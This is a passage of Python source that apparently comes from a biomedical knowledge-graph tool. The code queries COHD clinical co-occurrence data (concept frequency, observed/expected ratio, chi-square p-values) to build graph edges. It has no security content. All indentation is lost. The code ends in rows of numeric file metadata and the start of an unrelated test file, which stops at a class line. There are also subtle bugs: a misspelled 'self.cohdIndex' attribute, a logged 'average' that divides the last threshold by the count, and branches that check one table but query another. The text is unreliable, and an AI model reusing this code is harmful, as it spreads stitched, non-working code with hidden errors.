preferred_target_list = [preferred_target_curie for preferred_target_curie in self.cohdindex.get_curies_from_concept_id(freq_data['concept_id_2']) if self.synonymizer.get_canonical_curies(preferred_target_curie)[preferred_target_curie]['preferred_category'] == target_qnode.category]
for target_preferred_key in preferred_target_list:
if target_preferred_key not in new_edge[source_preferred_key]:
new_edge[source_preferred_key][target_preferred_key] = freq_data['concept_frequency']
else:
if freq_data['concept_frequency'] > new_edge[source_preferred_key][target_preferred_key]:
new_edge[source_preferred_key][target_preferred_key] = freq_data['concept_frequency']
if len(new_edge[source_preferred_key]) != 0:
for target_preferred_key in new_edge[source_preferred_key]:
swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "paired_concept_frequency", new_edge[source_preferred_key][target_preferred_key])
source_dict[source_preferred_key] = source_qnode_key
target_dict[target_preferred_key] = target_qnode_key
# Finally add the current edge to our answer knowledge graph
final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
# Add the nodes to our answer knowledge graph
if len(source_dict) != 0:
for source_preferred_key in source_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
if len(target_dict) != 0:
for target_preferred_key in target_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
if count != 0:
log.info(f"The average threshold based on {COHD_method_percentile}th percentile of paired concept frequency is {threshold/count}")
return final_kg
else:
source_dict = dict()
target_dict = dict()
new_edge = dict()
average_threshold = 0
count = 0
for target_preferred_key in target_qnode_omop_ids:
if target_qnode.category is None:
pass
else:
if self.synonymizer.get_canonical_curies(target_preferred_key)[target_preferred_key]['preferred_category'] == target_qnode.category:
pass
else:
continue
if len(target_qnode_omop_ids[target_preferred_key]) == 0:
log.warning(f"No OMOP concept id was found for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
continue
elif len(self.cohdindex.get_paired_concept_freq(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3)) == 0:
log.warning(f"No paired concept frequency was found from COHD database for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
continue
else:
pass
new_edge[target_preferred_key] = dict()
threshold = np.percentile([row['concept_frequency'] for row in self.cohdindex.get_paired_concept_freq(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3) if row['concept_frequency'] != 0], COHD_method_percentile)
average_threshold = average_threshold + threshold
count = count + 1
freq_data_list = [row for row in self.cohdindex.get_paired_concept_freq(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3) if row['concept_frequency'] >= threshold]
for freq_data in freq_data_list:
if source_qnode.category is None:
preferred_source_list = self.cohdindex.get_curies_from_concept_id(freq_data['concept_id_2'])
else:
preferred_source_list = [preferred_source_curie for preferred_source_curie in self.cohdindex.get_curies_from_concept_id(freq_data['concept_id_2']) if self.synonymizer.get_canonical_curies(preferred_source_curie)[preferred_source_curie]['preferred_category'] == source_qnode.category]
for source_preferred_key in preferred_source_list:
if source_preferred_key not in new_edge[target_preferred_key]:
new_edge[target_preferred_key][source_preferred_key] = freq_data['concept_frequency']
else:
if freq_data['concept_frequency'] > new_edge[target_preferred_key][source_preferred_key]:
new_edge[target_preferred_key][source_preferred_key] = freq_data['concept_frequency']
if len(new_edge[target_preferred_key]) != 0:
for source_preferred_key in new_edge[target_preferred_key]:
swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "paired_concept_frequency", new_edge[target_preferred_key][source_preferred_key])
source_dict[source_preferred_key] = source_qnode_key
target_dict[target_preferred_key] = target_qnode_key
# Finally add the current edge to our answer knowledge graph
final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
# Add the nodes to our answer knowledge graph
if len(source_dict) != 0:
for source_preferred_key in source_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
if len(target_dict) != 0:
for target_preferred_key in target_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
if count != 0:
log.info(f"The average threshold based on {COHD_method_percentile}th percentile of paired concept frequency is {threshold/count}")
return final_kg
def _answer_query_using_COHD_observed_expected_ratio(self, query_graph: QueryGraph, COHD_method_percentile: float, log: ARAXResponse) -> QGOrganizedKnowledgeGraph:
qedge_key = next(qedge_key for qedge_key in query_graph.edges)
log.debug(f"Processing query results for edge {qedge_key} by using natural logarithm of observed expected ratio")
final_kg = QGOrganizedKnowledgeGraph()
# if COHD_method_threshold == float("inf"):
# threshold = 4.44 # default threshold based on the distribution of 0.99 quantile
# else:
# threshold = COHD_method_threshold
# log.info(f"The threshod used to filter natural logarithm of observed expected ratio is {threshold}")
# extract information from the QueryGraph
qedge = query_graph.edges[qedge_key]
source_qnode_key = qedge.subject
target_qnode_key = qedge.object
source_qnode = query_graph.nodes[source_qnode_key]
target_qnode = query_graph.nodes[target_qnode_key]
# check if both ends of edge have no curie
if (source_qnode.id is None) and (target_qnode.id is None):
log.error(f"Both ends of edge {qedge_key} are None", error_code="BadEdge")
return final_kg
# Convert curie ids to OMOP ids
if source_qnode.id is not None:
source_qnode_omop_ids = self._get_omop_id_from_curies(source_qnode_key, query_graph, log)
else:
source_qnode_omop_ids = None
if log.status != 'OK':
return final_kg
if target_qnode.id is not None:
target_qnode_omop_ids = self._get_omop_id_from_curies(target_qnode_key, query_graph, log)
else:
target_qnode_omop_ids = None
if log.status != 'OK':
return final_kg
# expand edges according to the OMOP id pairs
if (source_qnode_omop_ids is None) and (target_qnode_omop_ids is None):
return final_kg
elif (source_qnode_omop_ids is not None) and (target_qnode_omop_ids is not None):
source_dict = dict()
target_dict = dict()
average_threshold = 0
count = 0
for (source_preferred_key, target_preferred_key) in itertools.product(list(source_qnode_omop_ids.keys()), list(target_qnode_omop_ids.keys())):
if source_qnode.category is None and target_qnode.category is None:
pass
else:
if self.synonymizer.get_canonical_curies(source_preferred_key)[source_preferred_key]['preferred_category'] == source_qnode.category:
pass
else:
continue
if self.synonymizer.get_canonical_curies(target_preferred_key)[target_preferred_key]['preferred_category'] == target_qnode.category:
pass
else:
continue
if len(source_qnode_omop_ids[source_preferred_key]) == 0:
log.warning(f"No OMOP concept id was found for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
continue
elif len(self.cohdindex.get_obs_exp_ratio(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3)) == 0:
log.warning(f"No paired concept ids was found from COHD database for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
continue
else:
pass
if len(target_qnode_omop_ids[target_preferred_key]) == 0:
log.warning(f"No OMOP concept id was found for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
continue
elif len(self.cohdindex.get_obs_exp_ratio(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3)) == 0:
log.warning(f"No paired concept ids was found from COHD database for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
continue
else:
pass
value = float("-inf")
threshold1 = np.percentile([row['ln_ratio'] for row in self.cohdindex.get_obs_exp_ratio(concept_id_1=source_qnode_omop_ids[source_preferred_key], domain="", dataset_id=3) if row['ln_ratio'] != float("-inf")], COHD_method_percentile) # calculate the percentile after removing the extreme value e.g. -inf
threshold2 = np.percentile([row['ln_ratio'] for row in self.cohdindex.get_obs_exp_ratio(concept_id_1=target_qnode_omop_ids[target_preferred_key], domain="", dataset_id=3) if row['ln_ratio'] != float("-inf")], COHD_method_percentile) # calculate the percentile after removing the extreme value e.g. -inf
threshold = min(threshold1, threshold2) # pick the minimum one for threshold
average_threshold = average_threshold + threshold
count = count + 1
omop_pairs = [f"{omop1}_{omop2}" for (omop1, omop2) in itertools.product(source_qnode_omop_ids[source_preferred_key], target_qnode_omop_ids[target_preferred_key])]
if len(omop_pairs) != 0:
res = self.cohdindex.get_obs_exp_ratio(concept_id_pair=omop_pairs, domain="", dataset_id=3) # use the hierarchical dataset
if len(res) != 0:
maximum_ln_ratio = res[0]['ln_ratio'] # the result returned from get_paired_concept_freq was sorted by decreasing order
value = maximum_ln_ratio
if value >= threshold:
swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "ln_observed_expected_ratio", value)
else:
continue
source_dict[source_preferred_key] = source_qnode_key
target_dict[target_preferred_key] = target_qnode_key
# Finally add the current edge to our answer knowledge graph
final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
# Add the nodes to our answer knowledge graph
if len(source_dict) != 0:
for source_preferred_key in source_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
if len(target_dict) != 0:
for target_preferred_key in target_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
if count != 0:
log.info(f"The average threshold based on {COHD_method_percentile}th percentile of natural logarithm of observed expected ratio is {threshold/count}")
return final_kg
elif source_qnode_omop_ids is not None:
source_dict = dict()
target_dict = dict()
new_edge = dict()
average_threshold = 0
count = 0
for source_preferred_key in source_qnode_omop_ids:
if source_qnode.category is None:
pass
else:
if self.synonymizer.get_canonical_curies(source_preferred_key)[source_preferred_key]['preferred_category'] == source_qnode.category:
pass
else:
continue
if len(source_qnode_omop_ids[source_preferred_key]) == 0:
log.warning(f"No OMOP concept id was found for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
continue
elif len(self.cohdindex.get_obs_exp_ratio(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3)) == 0:
log.warning(f"No paired concept frequency was found from COHD database for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
continue
else:
pass
new_edge[source_preferred_key] = dict()
threshold = np.percentile([row['ln_ratio'] for row in self.cohdindex.get_obs_exp_ratio(concept_id_1=source_qnode_omop_ids[source_preferred_key], domain="", dataset_id=3) if row['ln_ratio'] != float("-inf")], COHD_method_percentile)
average_threshold = average_threshold + threshold
count = count + 1
ln_ratio_data_list = [row for row in self.cohdindex.get_obs_exp_ratio(concept_id_1=source_qnode_omop_ids[source_preferred_key], domain="", dataset_id=3) if row['ln_ratio'] >= threshold]
for ln_ratio_data in ln_ratio_data_list:
if target_qnode.category is None:
preferred_target_list = self.cohdindex.get_curies_from_concept_id(ln_ratio_data['concept_id_2'])
else:
preferred_target_list = [preferred_target_curie for preferred_target_curie in self.cohdindex.get_curies_from_concept_id(ln_ratio_data['concept_id_2']) if self.synonymizer.get_canonical_curies(preferred_target_curie)[preferred_target_curie]['preferred_category'] == target_qnode.category]
for target_preferred_key in preferred_target_list:
if target_preferred_key not in new_edge[source_preferred_key]:
new_edge[source_preferred_key][target_preferred_key] = ln_ratio_data['ln_ratio']
else:
if ln_ratio_data['ln_ratio'] > new_edge[source_preferred_key][target_preferred_key]:
new_edge[source_preferred_key][target_preferred_key] = ln_ratio_data['ln_ratio']
if len(new_edge[source_preferred_key]) != 0:
for target_preferred_key in new_edge[source_preferred_key]:
swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "ln_observed_expected_ratio", new_edge[source_preferred_key][target_preferred_key])
source_dict[source_preferred_key] = source_qnode_key
target_dict[target_preferred_key] = target_qnode_key
# Finally add the current edge to our answer knowledge graph
final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
# Add the nodes to our answer knowledge graph
if len(source_dict) != 0:
for source_preferred_key in source_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
if len(target_dict) != 0:
for target_preferred_key in target_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
if count != 0:
log.info(f"The average threshold based on {COHD_method_percentile}th percentile of natural logarithm of observed expected ratio is {threshold/count}")
return final_kg
else:
source_dict = dict()
target_dict = dict()
new_edge = dict()
average_threshold = 0
count = 0
for target_preferred_key in target_qnode_omop_ids:
if target_qnode.category is None:
pass
else:
if self.synonymizer.get_canonical_curies(target_preferred_key)[target_preferred_key]['preferred_category'] == target_qnode.category:
pass
else:
continue
if len(target_qnode_omop_ids[target_preferred_key]) == 0:
log.warning(f"No OMOP concept id was found for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
continue
elif len(self.cohdindex.get_paired_concept_freq(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3)) == 0:
log.warning(f"No paired concept frequency was found from COHD database for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
continue
else:
pass
new_edge[target_preferred_key] = dict()
threshold = np.percentile([row['ln_ratio'] for row in self.cohdindex.get_obs_exp_ratio(concept_id_1=target_qnode_omop_ids[target_preferred_key], domain="", dataset_id=3) if row['ln_ratio'] != float("-inf")], COHD_method_percentile)
average_threshold = average_threshold + threshold
count = count + 1
ln_ratio_data_list = [row for row in self.cohdindex.get_obs_exp_ratio(concept_id_1=target_qnode_omop_ids[target_preferred_key], domain="", dataset_id=3) if row['ln_ratio'] >= threshold]
for ln_ratio_data in ln_ratio_data_list:
if source_qnode.category is None:
preferred_source_list = self.cohdindex.get_curies_from_concept_id(ln_ratio_data['concept_id_2'])
else:
preferred_source_list = [preferred_source_curie for preferred_source_curie in self.cohdindex.get_curies_from_concept_id(ln_ratio_data['concept_id_2']) if self.synonymizer.get_canonical_curies(preferred_source_curie)[preferred_source_curie]['preferred_category'] == source_qnode.category]
for source_preferred_key in preferred_source_list:
if source_preferred_key not in new_edge[target_preferred_key]:
new_edge[target_preferred_key][source_preferred_key] = ln_ratio_data['ln_ratio']
else:
if ln_ratio_data['ln_ratio'] > new_edge[target_preferred_key][source_preferred_key]:
new_edge[target_preferred_key][source_preferred_key] = ln_ratio_data['ln_ratio']
if len(new_edge[target_preferred_key]) != 0:
for source_preferred_key in new_edge[target_preferred_key]:
swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "ln_observed_expected_ratio", new_edge[target_preferred_key][source_preferred_key])
source_dict[source_preferred_key] = source_qnode_key
target_dict[target_preferred_key] = target_qnode_key
# Finally add the current edge to our answer knowledge graph
final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
# Add the nodes to our answer knowledge graph
if len(source_dict) != 0:
for source_preferred_key in source_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
if len(target_dict) != 0:
for target_preferred_key in target_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
if count != 0:
log.info(f"The average threshold based on {COHD_method_percentile}th percentile of natural logarithm of observed expected ratio is {threshold/count}")
return final_kg
def _answer_query_using_COHD_chi_square(self, query_graph: QueryGraph, COHD_method_percentile: float, log: ARAXResponse) -> QGOrganizedKnowledgeGraph:
qedge_key = next(qedge_key for qedge_key in query_graph.edges)
log.debug(f"Processing query results for edge {qedge_key} by using chi square pvalue")
final_kg = QGOrganizedKnowledgeGraph()
# if COHD_method_threshold == float("inf"):
# threshold = pow(10, -270.7875) # default threshold based on the distribution of 0.99 quantile
# else:
# threshold = COHD_method_threshold
# log.info(f"The threshod used to filter chi square pvalue is {threshold}")
# extract information from the QueryGraph
qedge = query_graph.edges[qedge_key]
source_qnode_key = qedge.subject
target_qnode_key = qedge.object
source_qnode = query_graph.nodes[source_qnode_key]
target_qnode = query_graph.nodes[target_qnode_key]
# check if both ends of edge have no curie
if (source_qnode.id is None) and (target_qnode.id is None):
log.error(f"Both ends of edge {qedge_key} are None", error_code="BadEdge")
return final_kg
# Convert curie ids to OMOP ids
if source_qnode.id is not None:
source_qnode_omop_ids = self._get_omop_id_from_curies(source_qnode_key, query_graph, log)
else:
source_qnode_omop_ids = None
if log.status != 'OK':
return final_kg
if target_qnode.id is not None:
target_qnode_omop_ids = self._get_omop_id_from_curies(target_qnode_key, query_graph, log)
else:
target_qnode_omop_ids = None
if log.status != 'OK':
return final_kg
# expand edges according to the OMOP id pairs
if (source_qnode_omop_ids is None) and (target_qnode_omop_ids is None):
return final_kg
elif (source_qnode_omop_ids is not None) and (target_qnode_omop_ids is not None):
source_dict = dict()
target_dict = dict()
average_threshold = 0
count = 0
for (source_preferred_key, target_preferred_key) in itertools.product(list(source_qnode_omop_ids.keys()), list(target_qnode_omop_ids.keys())):
if source_qnode.category is None and target_qnode.category is None:
pass
else:
if self.synonymizer.get_canonical_curies(source_preferred_key)[source_preferred_key]['preferred_category'] == source_qnode.category:
pass
else:
continue
if self.synonymizer.get_canonical_curies(target_preferred_key)[target_preferred_key]['preferred_category'] == target_qnode.category:
pass
else:
continue
if len(source_qnode_omop_ids[source_preferred_key]) == 0:
log.warning(f"No OMOP concept id was found for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
continue
elif len(self.cohdindex.get_obs_exp_ratio(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3)) == 0:
log.warning(f"No paired concept ids was found from COHD database for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
continue
else:
pass
if len(target_qnode_omop_ids[target_preferred_key]) == 0:
log.warning(f"No OMOP concept id was found for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
continue
elif len(self.cohdindex.get_obs_exp_ratio(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3)) == 0:
log.warning(f"No paired concept ids was found from COHD database for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
continue
else:
pass
value = float("inf")
threshold1 = np.percentile([row['p-value'] for row in self.cohdindex.get_chi_square(concept_id_1=source_qnode_omop_ids[source_preferred_key], domain="", dataset_id=3) if row['p-value'] != 0], COHD_method_percentile) # calculate the percentile after removing the extreme value e.g. 0
threshold2 = np.percentile([row['p-value'] for row in self.cohdindex.get_chi_square(concept_id_1=target_qnode_omop_ids[target_preferred_key], domain="", dataset_id=3) if row['p-value'] != 0], COHD_method_percentile) # calculate the percentile after removing the extreme value e.g. 0
threshold = max(threshold1, threshold2) # pick the maximum one for threshold
average_threshold = average_threshold + threshold
count = count + 1
omop_pairs = [f"{omop1}_{omop2}" for (omop1, omop2) in itertools.product(source_qnode_omop_ids[source_preferred_key], target_qnode_omop_ids[target_preferred_key])]
if len(omop_pairs) != 0:
res = self.cohdIndex.get_chi_square(concept_id_pair=omop_pairs, domain="", dataset_id=3) # use the hierarchical dataset
if len(res) != 0:
minimum_pvalue = res[0]['p-value'] # the result returned from get_paired_concept_freq was sorted by decreasing order
value = minimum_pvalue
if value <= threshold:
swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "chi_square_pvalue", value)
else:
continue
source_dict[source_preferred_key] = source_qnode_key
target_dict[target_preferred_key] = target_qnode_key
# Finally add the current edge to our answer knowledge graph
final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
# Add the nodes to our answer knowledge graph
if len(source_dict) != 0:
for source_preferred_key in source_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
if len(target_dict) != 0:
for target_preferred_key in target_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
if count != 0:
log.info(f"The average threshold based on {COHD_method_percentile}th percentile of chi square pvalue is {threshold/count}")
return final_kg
elif source_qnode_omop_ids is not None:
source_dict = dict()
target_dict = dict()
new_edge = dict()
average_threshold = 0
count = 0
for source_preferred_key in source_qnode_omop_ids:
if source_qnode.category is None:
pass
else:
if self.synonymizer.get_canonical_curies(source_preferred_key)[source_preferred_key]['preferred_category'] == source_qnode.category:
pass
else:
continue
if len(source_qnode_omop_ids[source_preferred_key]) == 0:
log.warning(f"No OMOP concept id was found for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
continue
elif len(self.cohdindex.get_obs_exp_ratio(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3)) == 0:
log.warning(f"No paired concept frequency was found from COHD database for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
continue
else:
pass
new_edge[source_preferred_key] = dict()
threshold = np.percentile([row['p-value'] for row in self.cohdindex.get_chi_square(concept_id_1=source_qnode_omop_ids[source_preferred_key], domain="", dataset_id=3) if row['p-value'] != 0], (100 - COHD_method_percentile))
average_threshold = average_threshold + threshold
count = count + 1
pvalue_data_list = [row for row in self.cohdindex.get_chi_square(concept_id_1=source_qnode_omop_ids[source_preferred_key], domain="", dataset_id=3) if row['p-value'] <= threshold]
for pvalue_data in pvalue_data_list:
if target_qnode.category is None:
preferred_target_list = self.cohdindex.get_curies_from_concept_id(pvalue_data['concept_id_2'])
else:
preferred_target_list = [preferred_target_curie for preferred_target_curie in self.cohdindex.get_curies_from_concept_id(pvalue_data['concept_id_2']) if self.synonymizer.get_canonical_curies(preferred_target_curie)[preferred_target_curie]['preferred_category'] == target_qnode.category]
for target_preferred_key in preferred_target_list:
if target_preferred_key not in new_edge[source_preferred_key]:
new_edge[source_preferred_key][target_preferred_key] = pvalue_data['p-value']
else:
if pvalue_data['p-value'] < new_edge[source_preferred_key][target_preferred_key]:
new_edge[source_preferred_key][target_preferred_key] = pvalue_data['p-value']
if len(new_edge[source_preferred_key]) != 0:
for target_preferred_key in new_edge[source_preferred_key]:
swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "chi_square_pvalue", new_edge[source_preferred_key][target_preferred_key])
source_dict[source_preferred_key] = source_qnode_key
target_dict[target_preferred_key] = target_qnode_key
# Finally add the current edge to our answer knowledge graph
final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
# Add the nodes to our answer knowledge graph
if len(source_dict) != 0:
for source_preferred_key in source_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
if len(target_dict) != 0:
for target_preferred_key in target_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
if count != 0:
log.info(f"The average threshold based on {COHD_method_percentile}th percentile of chi square pvalue is {threshold/count}")
return final_kg
else:
source_dict = dict()
target_dict = dict()
new_edge = dict()
average_threshold = 0
count = 0
for target_preferred_key in target_qnode_omop_ids:
if target_qnode.category is None:
pass
else:
if self.synonymizer.get_canonical_curies(target_preferred_key)[target_preferred_key]['preferred_category'] == target_qnode.category:
pass
else:
continue
if len(target_qnode_omop_ids[target_preferred_key]) == 0:
log.warning(f"No OMOP concept id was found for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
continue
elif len(self.cohdindex.get_paired_concept_freq(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3)) == 0:
log.warning(f"No paired concept frequency was found from COHD database for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
continue
else:
pass
new_edge[target_preferred_key] = dict()
threshold = np.percentile([row['p-value'] for row in self.cohdindex.get_chi_square(concept_id_1=target_qnode_omop_ids[target_preferred_key], domain="", dataset_id=3) if row['p-value'] != 0], COHD_method_percentile)
average_threshold = average_threshold + threshold
count = count + 1
pvalue_data_list = [row for row in self.cohdindex.get_chi_square(concept_id_1=target_qnode_omop_ids[target_preferred_key], domain="", dataset_id=3) if row['p-value'] <= threshold]
for pvalue_data in pvalue_data_list:
if source_qnode.category is None:
preferred_source_list = self.cohdindex.get_curies_from_concept_id(pvalue_data['concept_id_2'])
else:
preferred_source_list = [preferred_source_curie for preferred_source_curie in self.cohdindex.get_curies_from_concept_id(pvalue_data['concept_id_2']) if self.synonymizer.get_canonical_curies(preferred_source_curie)[preferred_source_curie]['preferred_category'] == source_qnode.category]
for source_preferred_key in preferred_source_list:
if source_preferred_key not in new_edge[target_preferred_key]:
new_edge[target_preferred_key][source_preferred_key] = pvalue_data['p-value']
else:
if pvalue_data['p-value'] < new_edge[target_preferred_key][source_preferred_key]:
new_edge[target_preferred_key][source_preferred_key] = pvalue_data['p-value']
if len(new_edge[target_preferred_key]) != 0:
for source_preferred_key in new_edge[target_preferred_key]:
swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "chi_square_pvalue", new_edge[target_preferred_key][source_preferred_key])
source_dict[source_preferred_key] = source_qnode_key
target_dict[target_preferred_key] = target_qnode_key
# Finally add the current edge to our answer knowledge graph
final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
# Add the nodes to our answer knowledge graph
if len(source_dict) != 0:
for source_preferred_key in source_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
if len(target_dict) != 0:
for target_preferred_key in target_dict:
swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
if count != 0:
log.info(f"The average threshold based on {COHD_method_percentile}th percentile of chi square pvalue is {threshold/count}")
return final_kg
def _get_omop_id_from_curies(self, qnode_key: str, qg: QueryGraph, log: ARAXResponse) -> Dict[str, list]:
log.info(f"Getting the OMOP id for {qnode_key}")
qnode = qg.nodes[qnode_key]
# check if the input qnode is valid
if not isinstance(qnode.id, str) and not isinstance(qnode.id, list):
log.error(f"{qnode_key} has no curie id", error_code="NoCurie")
return {}
res_dict = {}
if isinstance(qnode.id, str):
# res = self.synonymizer.get_canonical_curies(curies=qnode.id)
# if res[qnode.id] is None:
# log.error("Can't find the preferred curie for {qnode.id}", error_code="NoPreferredCurie")
# return {}
# else:
# preferred_curie = res[qnode.id]['preferred_curie']
try:
omop_ids = self.cohdindex.get_concept_ids(qnode.id)
except:
log.error(f"Internal error accessing local COHD database.", error_code="DatabaseError")
return {}
res_dict[qnode.id] = omop_ids
else:
# classify the curies based on the preferred curie
# res = self.synonymizer.get_canonical_curies(curies=qnode.id)
# for curie in res:
# if res[curie] is None:
# log.error("Can't find the preferred curie for {curie}", error_code="NoPreferredCurie")
# return {}
# else:
# if res[curie]['preferred_curie'] not in res_dict:
# res_dict[res[curie]['preferred_curie']] = []
for curie in qnode.id:
try:
omop_ids = self.cohdindex.get_concept_ids(curie)
except:
log.error(f"Internal error accessing local COHD database.", error_code="DatabaseError")
return {}
res_dict[curie] = omop_ids
return res_dict
def _convert_to_swagger_edge(self, subject: str, object: str, name: str, value: float) -> Tuple[str, Edge]:
swagger_edge = Edge()
self.count = self.count + 1
swagger_edge.predicate = f"biolink:has_{name}_with"
swagger_edge.subject = subject
swagger_edge.object = object
swagger_edge_key = f"COHD:{subject}-has_{name}_with-{object}"
swagger_edge.relation = None
type = "EDAM:data_0951"
url = "http://cohd.smart-api.info/"
swagger_edge.attributes = [Attribute(type=type, name=name, value=str(value), url=url),
Attribute(name="provided_by", value="ARAX/COHD", type=eu.get_attribute_type("provided_by")),
Attribute(name="is_defined_by", value="ARAX", type=eu.get_attribute_type("is_defined_by"))]
return swagger_edge_key, swagger_edge
def _convert_to_swagger_node(self, node_key: str) -> Tuple[str, Node]:
swagger_node = Node()
swagger_node_key = node_key
swagger_node.name = self.synonymizer.get_canonical_curies(node_key)[node_key]['preferred_name']
swagger_node.description = None
swagger_node.category = self.synonymizer.get_canonical_curies(node_key)[node_key]['preferred_category']
return swagger_node_key, swagger_node
| 61.427943
| 319
| 0.643093
| 6,929
| 55,838
| 4.829701
| 0.041853
| 0.103631
| 0.077992
| 0.024204
| 0.897415
| 0.888391
| 0.879068
| 0.873659
| 0.868161
| 0.865232
| 0
| 0.006325
| 0.283642
| 55,838
| 908
| 320
| 61.495595
| 0.8303
| 0.0752
| 0
| 0.78187
| 0
| 0.042493
| 0.135305
| 0.028404
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011331
| false
| 0.050992
| 0.026912
| 0
| 0.084986
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
0b450ade8c4ffafb52b0802e76b7bfde1a9eaf50
| 14,981
|
py
|
Python
|
test/test_split_ggo.py
|
project-origin/datahub_processor
|
9abdf64d22f7487d0eaa34d92ebc3f09089d4105
|
[
"MIT"
] | null | null | null |
test/test_split_ggo.py
|
project-origin/datahub_processor
|
9abdf64d22f7487d0eaa34d92ebc3f09089d4105
|
[
"MIT"
] | null | null | null |
test/test_split_ggo.py
|
project-origin/datahub_processor
|
9abdf64d22f7487d0eaa34d92ebc3f09089d4105
|
[
"MIT"
] | null | null | null |
import unittest
import pytest
import json
from datetime import datetime, timezone
from src.datahub_processor.ledger_dto import GGO, SplitGGOPart, SplitGGORequest, GGONext, GGOAction, generate_address, AddressPrefix
from bip32utils import BIP32Key
from sawtooth_sdk.processor.exceptions import InvalidTransaction, InternalError
from src.datahub_processor.split_ggo_handler import SplitGGOTransactionHandler
from .mocks import MockContext, FakeTransaction, FakeTransactionHeader
from marshmallow_dataclass import class_schema
class TestIssueGGO(unittest.TestCase):
